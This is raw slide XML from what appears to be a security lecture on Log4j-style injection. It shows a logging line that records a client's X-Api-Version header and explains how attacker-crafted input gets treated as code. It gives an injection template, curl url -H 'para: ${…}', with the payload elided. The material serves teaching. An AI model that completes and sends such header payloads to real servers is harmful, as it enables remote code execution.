              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Söhne"/>
              </a:rPr>
              <a:t>, which is obtained from an HTTP header called "X-Api-Version." In simple terms, it's looking for a specific piece of information (the API version) that the client has included in the HTTP request.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea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374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>logger.info("Received a request for API version " + </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>apiVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Söhne"/>
              </a:rPr>
              <a:t>: This line logs a message to some kind of logging system (Log4j). The message being logged is "Received a request for API version" followed by the value of </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>apiVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Söhne"/>
              </a:rPr>
              <a:t>. This helps developers keep track of what's happening in the application.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B3DF655-296B-8F88-9417-5125AA454FD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="872678" y="675261"/>
            <a:ext cx="9184131" cy="1746926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24209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37C8-CDBE-B05D-E2AC-FB6AF60DB490}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Attackers need to exploit the vulnerable code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C89ECC1F-0F8A-9730-15FF-596ABA9AD629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerable code doesn’t automatically  lead to attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Vulnerabilities are weaknesses or flaws in software, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Vulnerabilities can exist for various reasons, including coding mistakes, misconfigurations, or outdated software</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> A successful attack requires understanding of exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>often involves </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crafting specific inputs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>or actions to take advantage of the vulnerability's weaknesses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119530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7F6B4-DC59-1555-6D41-8BA8C4CDF0DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="85550" y="4001294"/>
            <a:ext cx="1291291" cy="715474"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE56A390-19A0-E347-C869-2AD181415A34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What is special about the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crafted input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>to a program by attackers?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{321640E4-2D31-FB06-8F47-AD0DA7291579}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Program Treatment of User Input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>When users interact with the program by entering information in a string format (e.g., text, numbers, or commands), the program processes and uses that input as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> to perform specific tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Cheating the Program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Attackers aim to manipulate the program's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>behavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> by making it believe that the user-provided </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crafted input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>) is actually a piece of "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>executable code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>" or commands that should be run by the program. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executable Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Scripting languages, commands, or any code that instructs the computer to perform specific actions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="String - Free construction and tools icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59D3E62-378F-97AC-159E-4410C116F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362" y="1124501"/>
            <a:ext cx="842108" cy="842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A9E371-8F82-CE30-220D-67D362258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394" y="972920"/>
            <a:ext cx="1952648" cy="12440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Equal Sign Means Relationship, Not Action - KP® Mathematics : KP®  Mathematics">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F2854EA-A251-66BE-B270-5F189315A2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096" y="1495344"/>
            <a:ext cx="574540" cy="3906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Question mark - Free interface icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A787BE7C-DAD5-C351-ACD7-CF831FCDE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7432" y="987725"/>
            <a:ext cx="516204" cy="51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24C7-626E-0FC9-0857-74E6C734CEDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The pattern of a crafted input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>‘‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to a web app</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C419B23-DE17-334B-7E88-8FD6D5E5229C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2135553" y="3634546"/>
            <a:ext cx="6492632" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="393A34"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="36ACAA"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="393A34"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -H </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>para</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: ${…}'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6052CCF-E095-ECB0-7A66-070C5A52BBB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="4635180"/>
            <a:ext cx="1990969" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>command-line tool for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>making HTTP requests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D45D8E3C-0F82-9AD4-0DBB-7815D237BAB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2428629" y="3926574"/>
            <a:ext cx="85969" cy="708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4564524-A32E-7E6C-35D3-E16DAA87D4FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876798" y="4953937"/>
            <a:ext cx="2359027" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>header parameter. e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>User-Agent, Cookies, X-Api-Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C790502C-34A4-2ADA-6F91-F337DA3AABEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5656814" y="4184677"/>
            <a:ext cx="320919" cy="716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1187A1-F1E9-F1A4-F3EB-299A4968037D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1938606"/>
            <a:ext cx="10329985" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attack assigns a string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${…} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to a “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>para</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” , where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>para</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a parameter of an HTTP request header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE4E3A7D-8A9F-EB52-1DB8-3FFB3C8BC883}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6639169" y="2664690"/>
            <a:ext cx="1879601" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>malicious code inside </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B246AB5C-852C-EC61-43A8-0866142760EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7371372" y="3255774"/>
            <a:ext cx="76204" cy="39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D2A13F-EA4A-668C-A779-B4166BE44E3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2982920" y="2589410"/>
            <a:ext cx="969106" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>HTTP request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Arrow Connector 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19141EF8-349D-8905-903D-FDEF334070A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3467473" y="3235741"/>
            <a:ext cx="398584" cy="38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7157EF8-8FE6-3AC5-3D71-9BE38A7A6A18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4307010" y="2492603"/>
            <a:ext cx="969106" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>request header</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
